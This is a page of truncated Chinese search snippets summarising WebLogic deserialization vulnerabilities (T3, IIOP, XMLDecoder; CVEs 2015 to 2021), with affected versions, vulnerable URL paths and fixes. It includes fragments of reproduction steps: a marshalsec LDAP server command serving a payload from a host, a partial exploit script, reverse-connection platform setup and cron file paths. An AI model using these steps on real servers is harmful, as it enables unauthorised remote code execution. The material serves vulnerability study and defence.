先引用一下奇安信团队发出的weblogic历史漏洞图,可以发现以反序列化为主,反序列化问题主要来自XMLDecoder和T3协议 image.png T3协议 weblogic t3协议就是weblogic...T3协议发送序列化数据时有时候并不只发送一段序列化数据,它可能会发送多个序列化数据,彼此之间以反序列化标志隔开,就像这样 CVE-2015-4852 漏洞版本 10.3.6.0, 12.1.2.0,...jdk1.7,weblogic10.3.6.0 用cc链1,3,6都能打。 这个洞可以说是weblogic反序列化漏洞的源头了。...于是便畅通无阻的触发了反序列化漏洞 resolveClass 这里之所以要说一下resolveClass,是因为网上很多T3反序列化相关文章都提了这个东西,也是我之前不知道的一个东西,所以便记录一下。...WebLogic 12.2.1.2 该漏洞利用weblogic的wls-wsat组件对XML用XMLDecoder进行解析的功能,从而对其传入恶意XML数据造成反序列化攻击。
WebLogic中默认包含的wls-wast 与wls9_async_response war包,由于以上WAR包采用XMLDecoder反序列化机制来处理发送过来的XML数据,远程恶意攻击者可以通过发送精心构造的...Weblogic因为XMLDecoder反序列化不安全数据导致的漏洞目前有三个,第一个是CVE-2017-3506 ,第二个是CVE-2017-10271。...这两个历史漏洞的数据输入点在 /wls-wsat/ 目录下。第三个是 CVE-2019-2725,这个漏洞的数据输入点增加了一个/_async/....网藤CRS/ARS产品已全面支持该漏洞的检测与验证,网藤用户可直接登陆www.riskivy.com进行验证。...二、影响版本 Oracle WebLogic Server 10.x Oracle WebLogic Server 12.1.3 三、漏洞危害 1.可通过访问路径/_async/AsyncResponseServiceSoap12
Weblogic-SSRF漏洞 环境准备 这里直接使用Vulhub/weblogic/ssrf 使用以下命令启动漏洞环境,访问http://ip:7001/uddiexplorer/,可以看到uddiexplorer...参考 Weblogic-SSRF漏洞复现 Weblogic-反序列化漏洞 漏洞简介 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。...该漏洞通过T3协议发送恶意的反序列化数据绕过了Weblogic的黑名单,成功反序列化执行任意命令。但该漏洞利用条件较高,官方也归类为需要身份认证。...这个漏洞需要满足以下两个条件: Weblogic开启T3协议 可以获取到SerializedSystemIni.dat文件 影响版本 WebLogic Server 10.3.6.0 WebLogic...修复建议 如果不依赖T3协议进行JVM通信,可禁用T3协议 排查弱口令 升级补丁 参考 WebLogic 反序列化漏洞(CVE-2019-2890)分析 Weblogic t3反序列化漏洞(CVE-2019
ac ed 00 05是java序列化内容的特征,漏洞挖掘人员通常对 weblogic 在 7001 端口的 T3 协议进行抓包,发现流量中有 java 反序列化之后数据的 Magic ac ed 00...4、Weblogic反序列化漏洞汇总 Weblogic反序列化高危漏洞主要涉及到两个种类: 1、利用xml decoded反序列化进行远程代码执行的漏洞,例如: CVE-2017-10271,CVE-2017...然后将其序列化,提交给未做安全检测的Java应用。Java应用在进行反序列化操作时,则会触发TransformedMap的变换函数,执行预设的命令。...在进行反序列化时并不会被resolveProxyClass检测,导致绕过的产生,最后成功的进行了反序列化攻击。...影响版本:WebLogic 10.X WebLogic 12.1.3 漏洞分析: 搭建环境,访问http://ip:7001/_async/AsyncResponseService 如果出现以下页面,则存在漏洞
目录 一,漏洞信息 二,实验环境 三,漏洞利用 第一步.查看其是否开启了wls9_async_response组件 1.打开Centos 2.开启weblogic 3.访问weblogic 4.查看async... 5.构造一个payload 6.go发送 7.查看终端监听 方法二:python脚本使用方法 1.监听 2.使用python脚本 3.查看终端监听 编辑 四,解决办法 一,漏洞信息 漏洞编号...:OracleWebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814) 影响版本:WebLogic 10.x WebLogic 12.1.3 WebLogic...存在于weblogic自带的wls9_async_response.war组件及wls-wsat组件中,在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP 请求,未授权的情况下远程执行命令...部分版本WebLogic中默认包含的wls9_async_response包,主要是为WebLogic Server提供异步通讯服务。 反序列化:就是讲字节序列转化成对象的过程。
1 漏洞描述 近日,互联网爆出WebLogicwls9-async反序列化远程命令执行漏洞。攻击者利用该漏洞,可在未授权的情况下远程执行命令。该漏洞危害程度为高危(High)。...版本 3 漏洞原理 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时...4 漏洞复现 靶机环境:Weblogic 10.3.6 ?...b) 对应用程序进行严格测试; 简书复现案例 https://www.jianshu.com/p/c4982a845f55 CNVD-C-2019-48814漏洞Nmap检测插件 链接:https...年的一样 去年的Weblogic补丁已经把这几个标签补了,打了补丁的已经不能生成java实例了 但是没有打补丁的还是可以测试的 参考下面这个文章即可 WebLogic XMLDecoder反序列化漏洞
漏洞简介事项描述漏洞概述允许未经身份验证的攻击者通过构造T3网络协议请求进行攻击,成功利用该漏洞可实现在目标主机上执行任意代码。...Coherence 3.7.1.17Oracle Coherence 12.1.3.0.0Oracle Coherence 12.2.1.3.0Oracle Coherence 12.2.1.4.0漏洞编号...CVE-2020-2555漏洞搭建这里使用vulfocus进行复现。...漏洞复现直接使用网上的exp进行漏洞的验证。#!...return x.check(url, cmd,20)if __name__ == '__main__': parser = argparse.ArgumentParser(description='Weblogic
漏洞简介事项描述漏洞概述CVE-2019-2729漏洞是对CVE-2019-2725漏洞补丁进行绕过,形成新的漏洞利用方式,属于CVE-2019-2725漏洞的变形绕过。...与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令...影响范围10.3.6.0.012.1.3.0.012.2.1.3.0漏洞编号CVE-2019-2729漏洞搭建这里使用vulfocus进行复现。...漏洞复现访问http://192.168.146.167:23946/wls-wsat/CoordinatorPortType,发现访问成功,说明存在漏洞。
漏洞简介事项描述漏洞概述wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。...由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。...影响范围10.3.6.0.012.1.3.0.0漏洞编号CVE-2019-2725漏洞搭建这里使用vulfocus进行复现。...漏洞复现访问http://192.168.146.167:13315/_async/AsyncResponseService,发现访问成功,说明可能存在漏洞。...Header> 发现dnslog成功收到数据,说明确实存在漏洞
预警编号:NS-2019-0015 2019-04-18 TAG: Oracle、Weblogic、远程代码执行 危害等级: 高,攻击者利用此漏洞可执行任意代码。...版本: 1.0 1 漏洞概述 4月17日,国家信息安全漏洞共享平台(CNVD)公开了Weblogic反序列化远程代码执行漏洞,此漏洞存在于weblogic自带的wls9_async_response.war...组件中,由于该war包在反序列化处理输入信息时存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程代码执行。...WebLogic Server 12.1.3 此漏洞影响启用bea_wls9_async_response组件的所有Weblogic版本。...3漏洞排查 此漏洞存在于异步通讯服务,用户可通过访问路径/_async/AsyncResponseService,判断该不安全组件是否开启。
Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。...漏洞编号 CVE-2017-10271 影响范围 Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.1.3.0.0版本 Oracle...WebLogic Server 12.2.1.1.0版本 漏洞详情 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞...攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。 修复方案 升级Oracle 10月份补丁 对访问wls-wsat的资源进行访问控制
本文字数:1913 阅读时长:4~6min 声明:仅供学习参考使用,请勿用作违法用途,否则后果自负 0x01 漏洞复现 《CVE-2021-2394:Weblogic反序列化漏洞复现》 0x02 调试准备...,有效解决了jar包冲突问题 添加依赖包,经过测试,需要添加的包如下图,均可在weblogic的安装目录下找到 这里选择本地调试,输出序列化文件再调用readObject()即可 0x03 漏洞分析...com.tangosol.util.aggregator.TopNAggregator$PartialResult#readExternal中,先是利用ExternalizableHelper#readObject反序列化了...weblogic的补丁经常是把之前CVE所利用到的类的包加入黑名单(这次好像还修了iiopinputstream)导致有很多师傅去找能够代替的链,很多CVE就是这么来的。...方法读取数据流进行反序列化,没有使用打了补丁的ObjectInputStream(指黑名单类没有经过ObjectInputStream),从而绕过14825的补丁,也是一个值得学习的思路(见参考链接最后一个
本文作者:TtssGkf(Ms08067实验室 SRSP TEAM小组成员) Weblogic反序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象...,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果。...随着每次补丁的修复,很多Weblogic反序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面比较广,所以近几年还是持续有新出漏洞的,这也体现了挖掘出新漏洞的高手们对...目前在做渗透测试时,Weblogic漏洞用来攻击没打补丁的系统会比较有效。...《从零开始weblogic的反序列化漏洞》的分享,带领大家了解weblogic的工作模式,明白漏洞原理,从而掌握调试weblogic反序列化漏洞的基本能力。
CVE-2020-14644 weblogic iiop反序列化漏洞 0x00 weblogic 受影响版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0,...14.1.1.0.0 0x01 环境准备 1、安装weblogic server版本。...0x02 反序列化gadget分析。 这次iiop的关键反序列化类是RemoteConstructor。...transient和static修饰符修饰的成员变量不会参与序列化和反序列化反序列化对象和序列化前的对象的全类名和serialVersionUID必须一致在目标类中添加私有的writeObject和readObject...方法可以覆盖默认的序列化和反序列化方法在目标类中添加私有的readResolve可以最终修改反序列化回来的对象,可用于单例模式防止序列化导致生成第二个对象的问题readResolve操作是在readobject
NS1.NAMESERVER.COM/NS2.NAMESERVER.COM 这样payload.com的域名解析请求将由nameserver.com完成,同时将nameserver.com指向你的反连平台...1.1.1.1 搭建反连平台 https://github.com/Li4n0/revsuit/releases先运行一遍以便生成数据库和配置文件,修改config.yaml 在VPS 1.1.1.1
反序列化漏洞CVE-2018-2628。...漏洞影响 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 Weblogic 反序列化漏洞历程 这里简单的说下几个有公开利用方式的...Weblogic反序列化漏洞。...而后的漏洞也证明了这一点。 CVE-2016-0638 Weblogic的反序列化的点有着三个,黑名单ClassFilter.class也作用于这三个位置。...参考链接 Ysoserial CVE-2018-2628 简单复现与分析 WebLogic反序列化漏洞重现江湖,CVE-2017-3248成功绕过之前的官方修复 Oracle Critical Patch
可造成反序列化漏洞。...该漏洞允许未经身份验证的攻击者通过IIOP,T3进行网络访问,未经身份验证的攻击者成功利用此漏洞可能接管Oracle Weblogic Server。...-cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.247.128/#Poc 1389 3、运行 payload 文件生成反序列化数据文件...至此,我们可以通过反序列化已经可以调用任意类的无参方法。很容易联想到 CVE-2020-14645 和 fastjson 的利用方式,即通过JdbcRowSetImpl进行 JNDI 注入。...0x07 修复方式 1、安装官方补丁 https://www.oracle.com/security-alerts/cpuoct2020.html 2、限制T3访问来源 漏洞产生于WebLogic
0x02 漏洞概述 编号:CVE-2021-2394 Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的...成功利用该漏洞的攻击者可以接管WebLogic Server。...这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。...0x03 影响版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server...\user_projects\domains\base_domain\startWebLogic.cmd weblogic启动成功的截图 0x05 漏洞复现 1、下载marshalsec利用marshalsec
一、漏洞描述 4月17日,国家信息安全漏洞共享平台(CNVD)公开了Weblogic反序列化远程代码执行漏洞(CNVD-C-2019-48814)。...由于WebLogic安装包中默认SDK为1.6版本,在JDK版本<=JDK7u21前提下存在Java原生类反序列化漏洞,使用ysoserial工具生成恶意序列化对象(以计算器程序为例),可在调试器中查看到当前所传入的序列化对象...到此就完成了漏洞利用的全过程,下图演示了漏洞利用效果,通过反序列化漏洞成功运行了计算器程序: ?...from=timeline 升级本地JDK版本 因为Weblogic所采用的是其安装文件中默认1.6版本的JDK文件,属于存在反序列化漏洞的JDK版本,因此升级到JDK7u21以上版本可以避免由于Java...原生类反序列化漏洞造成的远程代码执行。
centos系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件CVE-2017-10271(XML Decoder反序列化...)简介Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令漏洞环境...漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现输入此命令即可查看weblogic用户密码,密码随机,请自行docker...使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。...https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现https://github.com/DXask88MA/Weblogic-CVE
领取专属 10元无门槛券
手把手带您无忧上云